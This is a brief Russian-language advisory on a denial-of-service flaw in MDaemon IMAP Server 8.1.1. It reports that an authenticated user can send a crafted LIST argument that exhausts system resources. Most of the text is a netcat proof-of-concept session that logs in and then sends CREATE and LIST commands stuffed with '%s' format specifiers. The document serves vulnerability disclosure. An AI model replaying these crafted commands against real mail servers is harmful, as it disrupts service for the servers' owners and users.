Программа: MDaemon IMAP Server 8.1.1

Уязвимость существует при обработке
входных данных в команде LIST. Удаленный
авторизованный пользователь может с
помощью специально сформированного
аргумента заставить приложение потреблять
все доступные ресурсы на системе.

Пример:

M:\Distrib\nc>nc -v 127.0.0.1 143
Blaster [127.0.0.1] 143 (imap) open
* OK hack.com IMAP4rev1 MDaemon 8.1.1 ready
0001 LOGIN «densen» «console»
0001 OK LOGIN completed
0003 CREATE «%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%
s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s»
0003 OK CREATE completed
0004 LIST «%s%s%s%s%s%s%s» «%s»



Оставить мнение